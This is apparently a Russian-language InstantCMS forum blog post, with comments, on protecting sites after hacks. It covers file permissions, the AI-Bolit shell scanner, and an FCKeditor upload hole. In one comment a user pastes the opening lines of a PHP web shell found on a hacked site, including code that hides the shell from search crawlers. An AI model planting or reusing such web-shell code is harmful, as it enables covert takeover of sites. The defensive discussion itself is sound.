Техника безопасности или АнтиШелл

+57
3.07K
Приветствую!

В последнее время участились попытки взлома сайтов на Инстанте, поэтому решил еще раз напомнить основные меры предосторожности. Если вы в этом ничего не понимаете — в конце поста есть скрипт для сканирования сайта на потенциальные уязвимости.



1я цифра — права владельца
2я цифра — права группы
3я цифра — права всех остальных

1. Владелец всех папок/файлов сайта должен отличаться от юзера, под которым выполняются скрипты.
2. Права на все папки должны быть 755 (кроме тех, в которые должны быть разрешена запись)
3. Права на все файлы должны быть 644 (кроме тех, которые разрешено редактировать)

Если владелец папок/файлов совпадает с юзером, под которым выполняются скрипты(и нет возможности это исправить — например на вирт хостинге), то права нужно выставить другие:
1. Права на все папки должны быть 555 (кроме тех, в которые должны быть разрешена запись — кэш, images, upload)
2. Права на все файлы должны быть 444 (кроме тех, которые разрешено редактировать)

Существует простой способ просканировать сайт на шеллы (может найдет не 100%, но основные выявит) и проверить права на папки.

Для этого скачайте файл (автор скрипта Григорий Земсков), закиньте в корень сайта и запустите. Обратите внимание на доступные к записи папки. После проверки файл нужно удалить.

PS если не уверены в настройке прав на своем сайте — не поленитесь скачать скрипт и запустить.
0
Thanatognozija Thanatognozija 12 лет назад #
Очень, очень, очень актуально. Никогда не думал, что такое возможно, но вот, взломали... Спасибо за такое решение!
+1
Suslik Suslik 12 лет назад #
меня тоже взломали 2 недели назад, и что интересно - залили какие-то свои левые рекламные нтмл-ки с копиями каких-то форумов как будто с обсуждением какой-то ерунды типа чертежей шестеренок, но что интересно - с поисковиков на их рекламу валом повалили пользователи - вот я теперь в шоке - мы раскручиваем раскручиваем и все бестолку, тут какой-то левый спаммер позаливал свою ерунду и на нее кинулись толпой пользователи, у меня даже был один пустой домен, они и туда свой спам залили и туда тоже люди повалили - на нулевый домен - вот загадка - как это делается?
-1
spacer spacer 12 лет назад #
Да загадки нет большой.
Просто псевдостраниц заливается очень большое количество, тысячи. И что-то да попадает на некоторое время в поиск, пока Яндекс не выкинет.
Вы можете попробовать, нагенерить страниц по каким-то запросам, и закинуть на сайт. Трафик пойдет некоторое время, но потом будет хуже.
0
Ганс Ганс 11 лет назад #
с буксы какой-нибудь народ валил)))
0
stasis stasis 12 лет назад #
Просканировал... и что мне делать с этими скриптами?
Скрипт использует подозрительный код: ./admin/applets/phpinfo.php ./admin/includes/phpinfo.php ./components/onlaintv/frontend.php ./components/video/video_operations_movies.php ./core/cms.php ./includes/bbcode/bbcode.lib.php ./modules/mod_wrapper/module.php ./plugins/p_fckeditor/fckeditor/fckeditor_php4.php ./plugins/p_fckeditor/fckeditor/fckeditor_php5.php
0
eoleg eoleg 12 лет назад #
ничего, просто скрипт некоторые функции считает подозрительными.
для успокоения сравните размеры этих файлов на сервере и в дистрибутиве
0
Mario Mario 12 лет назад #
спасибо за скриптик.
есть еще какие-нить дополнительные варианты предохранений от взлома? например, ну незнаю - скажем правильно настроенный .htaccess
+2
SJen SJen 12 лет назад #
есть один - 100% ный способ защиты, через htaccess
поставить пароль на папку с сайтом)
+2
Thanatognozija Thanatognozija 12 лет назад #
Вот, может быть кому-то пригодится, была поднята тема здесь: http://instantcms.ru/forum/thread10918.html
0
Suslik Suslik 12 лет назад #
аааа - спасибо, а я тоже думал - через что взломали, оказывается опять инстант... ммм-да, а дыру то нашли?
+1
Евгений Фоменко Евгений Фоменко 12 лет назад #
Это не дыра в своем натуральном понимании - это наша халатность и некорректная настройка хостинга "на и так сойдет". У меня вон в папку includes набросали мусора. Кто виноват? Я блин ((((
+4
Soul Soul 12 лет назад #
Полезный скрипт. Не так давно добавил его к функциям админки, кому интересно - можно глянуть тут.
+3
SJen SJen 12 лет назад #
почитал про встраивание в админку
можно в сам скрипт в начале добавить проверку на админа
то есть если он открывается не от лица Инстантовского юзера с правами администратора, то ничего не делать. Тогда напрямую его никто посторонний не сможет открыть.
+1
Soul Soul 12 лет назад #
Если еще подскажите как - цены вам не будет! :)
Вот только построено на примере "Информация PHP", и даже она открывается прямым запросом http://сайт/admin/includes/phpinfo.php ... :(
отсюда и доп защита через паролирование...
+4
SJen SJen 12 лет назад #
поправлю файл и закину, тут на пальцах не объяснишь)
+1
Soul Soul 12 лет назад #
ОК. спасибо!
-2
letsgo letsgo 12 лет назад #
Если уж начинать то с начала. В исп менеджере права на папку общие, затем уже по порядку.
+1
PET PET 12 лет назад #
Новая версия скрипта идёт уже с паролем. Качайте: http://www.revisium.com/ai/
0
googlebot googlebot 12 лет назад #
пароль, как параметр в урл, - это смешно...
+1
SJen SJen 12 лет назад #
нужна проверка авторизации в инстанте и проверка прав, это будет лучше всего
0
googlebot googlebot 12 лет назад #
не разжуете еще плз разницу в правах, когда php стоит как модуль apache и как cgi(fastcgi)
0
SJen SJen 12 лет назад #
к сожалению нет..
Я так глубоко не копал
0
eoleg eoleg 12 лет назад #
ZEOS ANTIVIRUS - Антивирус для сайта
-----------------------------------------------------
http://dle-news.ru/modules/1058-zeos-antivirus.html

а мне этот понравился, может он хуже чем айболит?
0
Patriot Patriot 12 лет назад #
3 года был сайт на DLE, отзывы по ZEOS ANTIVIRUS не ахти. Да и по разговорам форумчан Зеос делал падляны раньше, не знаю как сейчас...
0
eoleg eoleg 12 лет назад #
код открытый
считает контрольные суммы
а этого для контроля мне кажется достаточно
0
Dizels Dizels 12 лет назад #
Прошу прощения за скорее всего глупый вопрос, но вот выдал мне скрипт:
Код PHP:
Скрипт использует подозрительный код:

    ./admin/applets/phpinfo.php
    ./admin/includes/phpinfo.php
    ./assets/php/phpmailer/class.phpmailer.php
    ./core/cms.php
    ./includes/bbcode/bbcode.lib.php
    ./plugins/p_fckeditor/fckeditor/fckeditor_php4.php
    ./plugins/p_fckeditor/fckeditor/fckeditor_php5.php

Небезопасно! Директории, доступные скрипту на запись:

    ./admin
    ./admin/ajax
    ./admin/applets
    ./admin/components
    ./admin/components/actions
    ./admin/components/arhive
    ./admin/components/autoawards
    ./admin/components/autoawards/images
    ./admin/components/banners
    ./admin/components/blogs
    ./admin/components/board
    ./admin/components/catalog
    ./admin/components/catalog/js
    ./admin/components/clubs
    ./admin/components/comments
    ./admin/components/content
    ./admin/components/faq
    ./admin/components/forms
    ./admin/components/forum
и много еще папок - соответственно какие права мне нужно поставить? А то как-то вначале сообщения непонятно написано на этот счет.
+1
Soul Soul 12 лет назад #
+1
SJen SJen 12 лет назад #
проверьте что стоит, вообще надо 755
Но если так и стоит и папка доступна для записи - ставьте 555
0
Алексей Алексей 12 лет назад #
А кто слышал о скрипте который может изменить chmod ? заливаешь его на хостинг а потом запускаешь из урла, перед заливкой в скрипте нужно указать на каких файлах нужно изменить права доступа. Я вот о чём подумал - если юзер сможет такой скрипт загрузить к себе в контент(фото, файлы,) или на форум то... вообщем понятно что будет))...беспроблемм сможет скачать полностью сайт например с помощью Explorer Enterprise. Возможен ли такой способ взлома?
-2
letsgo letsgo 12 лет назад #
Sjen:
Владелец всех папок/файлов сайта должен отличаться от юзера, под которым выполняются скрипты.

Немного точнее этот момент.

2 вопрос. Если в Исп менеджере стоят на общую папку сайтов права 755, так и оставить либо ставим 777 и далее по инструкции?
0
SJen SJen 12 лет назад #
что значит "общая папка"? - папка, в которую разрешена запись, типа images?
Вот еще нашел пост, который писал Fuze - показать.. Пункты 2-6 актуальны, я написал почти то же самое.

Основные моменты оттуда
0
eoleg eoleg 12 лет назад #
апачь запускается от имени например www-data а владельцем ваших папок и файлов в директории www не должен быть www-data а ктото другой, например letsgo
+1
Dinar Dinar 12 лет назад #
Но оунером папок создаваемых самим инстантом будет все равно www-data (или под кем апач запущен).
0
eoleg eoleg 12 лет назад #
в Исп менеджере выйдите в директорию site.ru и выбрав ее поменяйте владельца, права на папки 755, права на файлы 644 рекурсивно и затем на указанные fuze папки поставьте отличные от этих прав права (777)
-1
Reborn Reborn 12 лет назад #
ispmanager изначально - зло. Он создает кривые пути,в силу своей ширпотребности.
Пора уже давно было привыкать к консоли и от неё оталкиваться.
0
lezginka.ru lezginka.ru 12 лет назад #
профи , большая просьба, в конце резюмировать то, что пишет SJen,malanas,Soulpest , иначе чайнику не понять, что и как .
0
SJen SJen 12 лет назад #
напишу проще
Скачать айболита, запустить(либо по моей ссылке, либо тут еще кидали - более новая версия). Если будут найдены вирусы - почистить. Если открыты права на запись в ненужные папки - исправить.
LonelyCat LonelyCat 12 лет назад #
Комментарий удален
0
SJen SJen 12 лет назад #
может не хватает времени для работы скрипта - могу предложить кинуть его не в корневую папку, а в ту, где файлов поменьше и запустить, тогда будет понятно в чем проблема.
0
Suslik Suslik 12 лет назад #
Все это хорошо, антивирусы это виндовая беда - там с вирусами борятся при помощи антивирусов, в нормальных же системах закрывают дыры, соответственно вопрос:

Через какую дыру произошел очередной массовый взлом инстанта???
0
Kornely Kornely 12 лет назад #
кто-то мне говорил, что через яву народ проникает, но насчет инстанта точно не могу сказать. надо контролировать и данный вопрос.
+1
googlebot googlebot 12 лет назад #
дыра в файловом менеджере fckeditor позволяла заливать на сайт файлы (например pdf с внешними ссылками), а на некоторых хостингах можно было переназначить тип для картинок на пхп, что давало возможность выполнить произвольный пхп-код. тестируйте патч от fuze
+1
lezginka.ru lezginka.ru 12 лет назад #
googlebot , спасибо, что по человечьи изъяснил :)
еще бы кто защитные скрипты к админке привязал бы
0
Скорпион Скорпион 12 лет назад #
Уважаемые Гуру - подскажите.
Положил файл - запускаю - выводится листинг файла без выполнения.
Добавил в начала к <? слово php и заработало.
Причем с этой проблемой уже не раз встречаюсь.
Подскажите - от чего так?
0
Марат Марат 12 лет назад #
У вас не включены короткие теги. Сделать это можно в php.ini
Код PHP:
Код PHP:
short_open_tag = On
или если нет доступа к php.ini и php установлен как модуль Апача, можно в .htacceess
Код PHP:
php_flag short_open_tag On
Это мы разрешаем короткую форму записи (<? ?>) тегов PHP.
Для кодеров всё же считается хорошим тоном писать в коде <?php ?> для портативности скриптов.
0
Скорпион Скорпион 12 лет назад #
Огромнешее спасибо - либо плохо рыл...но както не удалось найти....
А вот ещё один вопросец - из это темы......
У меня была проблема в админке iChat - не выводились значения параметров и вообще ничего нельзя было изменить - решилось изменением в backend.php строк с <?=@ на <?php echo

Причем локально - на Денвере - никаких проблем - а вот на рабочем сервере была беда. Подозреваю что возможно что-то не так настроено в PHP - но мне легче было изменить код - нежели разбираться в необходимых настройках PHP - так как все остальное вроде работает исправно.

Это из этой же истории??
0
Евгений Фоменко Евгений Фоменко 12 лет назад #
Записываюсь на анализы )
Хотя вопрос безопасности очень актуален - нужно будет этому уделить отдельное внимание
0
Female Female 12 лет назад #
айболит не сработал в моем случае,думаю и не только у меня .поэтому ,если вы не проставляли права ,то лучше проверьте самостоятельно все файлы и папки (в моем случае было залито в саму папку Upload файлы :pdf,xml), и поставьте нужные права
SJen спасибо за разжевывание материала)))
0
Female Female 12 лет назад #
не могу понять, как защитить папку Upload,какими правами,чтоб в нее не заливали хрень всякую тогда?
+1
googlebot googlebot 12 лет назад #
Female, pdf и xml скорее всего и не были ни вирусами ни шеллами, обычно заливают просто статьи с внешними ссылками. А заливают их, используя дыру в файлменеджере FCKeditor. Защитить можно удалив папку /plugins/p_fckeditor/fckeditor/editor/filemanager/connectors/, однако пользователи не смогут заливать файлы и изображения.
0
Female Female 12 лет назад #
спасибо за ответ!да там в этих файлах ссыль на один украинский сайт,залили на оба сайта кстати в один день. вообще файлы я вроде как везде устранила возможность закачать .только изображения.Получается замкнутый круг какой то.
0
Man Man 12 лет назад #
У меня сразу на трех инстантовских сайтах залили pdf со статьями на 1 сайт kralya.org.ua
+1
Female Female 12 лет назад #
+2
Female Female 12 лет назад #
кто сидит на старых версиях проверьте : сайт.ru\components\clubs\js файл club.php
проверяла старые архивы антивир нашел шелл ,не помню должен ли быть вообще данный файл,в самом верху у меня было прописано:
<?php # Web Shell by oRb
$auth_pass = "63aad2be69b352c04c987854823a5e";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';

if(!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.0 404 Not Found');
exit;
}
0
DAngel DAngel 12 лет назад #
Не совсем ясно как заливают файлы при отключенных пользователях? Если брать скрипт айболита, то я его заливаю на хостинг и он конечно с моими правами там, запуская его, ему конечно доступны на запись папки. Т.е. получается, что фаил можно залить угнав логин и пасс от ФТП.
-1
Владимир Владимир 12 лет назад #
Растолкуйте, знатоки, что означает:
"Владелец всех папок/файлов сайта должен отличаться от юзера, под которым выполняются скрипты".
То есть, если я, например, владелец сайта (он же - админ). А кто тогда юзер, под которым выполняются скрипты?
0
DAngel DAngel 12 лет назад #
По всей видимости он же. Если хостинг. А вот если свой сервер можно и покрутить с правами.
0
Vlad Vlad 11 лет назад #
Владелец всех папок/файлов сайта должен отличаться от юзера, под которым выполняются скрипты.
Как это узнать и кто есть кто?

Еще от автора

Обновление компонента "Мне нравится"
Приветствую. Закончил версию с исправлением ошибок и багов, всем пользователям обновление выслано на электронку.
Обновление компонента  "Каталог дополнений в админку"
Приветствую. Обновление самого популярного аддона из официального каталога дополнений.
Обновленный парсер Яндекс.Карт
Приветствую Изменения довольно значительны, поэтому имеет смысл оформить их отдельным постом.
Используя этот сайт, вы соглашаетесь с тем, что мы используем файлы cookie.